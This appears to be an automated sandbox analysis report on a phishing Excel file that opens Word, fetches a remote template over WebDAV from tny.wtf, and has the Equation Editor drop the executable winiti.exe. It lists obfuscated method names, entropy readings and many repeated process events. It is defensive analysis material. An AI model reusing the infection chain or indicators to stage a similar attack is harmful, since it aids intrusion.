                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 9.2.winiti.exe.3a40ff8.5.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                Source: 9.2.winiti.exe.680000.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 9.2.winiti.exe.680000.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 9.2.winiti.exe.26e505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 9.2.winiti.exe.26e505c.4.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 9.2.winiti.exe.3ac8a18.6.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'

                Persistence and Installation Behavior

                barindex
                Microsoft Office launches external ms-search protocol handler (WebDAV)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
                AI detected suspicious Excel or Word document
                Source: Office documentLLM: Score: 8 Reasons: The screenshot contains a visually prominent section with the Microsoft Office logo and the text 'This document is protected'. This could mislead users into thinking they need to click on a link or button to view the document. The text creates a sense of urgency or necessity to access the document, which is a common tactic in phishing attempts. Additionally, the use of the Microsoft Office logo impersonates a well-known brand, adding to the credibility of the phishing attempt. The combination of these elements suggests a high risk of phishing.
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 1804222C.doc.4.drJump to dropped file
                Office viewer loads remote template
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: RFQ#51281AOLAI.xlsStream path 'MBD001BDE15/Package' entropy: 7.97230907292 (max. 8.0)
                Source: RFQ#51281AOLAI.xlsStream path 'Workbook' entropy: 7.93979191676 (max. 8.0)
                Source: 1E630000.0.drStream path 'MBD001BDE15/Package' entropy: 7.96745097321 (max. 8.0)
                Source: 1E630000.0.drStream path 'Workbook' entropy: 7.99937668928 (max. 8.0)
                Source: ~DFB487D2232F45372D.TMP.0.drStream path 'Package' entropy: 7.96745097321 (max. 8.0)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 55F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 6820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 7820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00910101 rdtsc 10_2_00910101
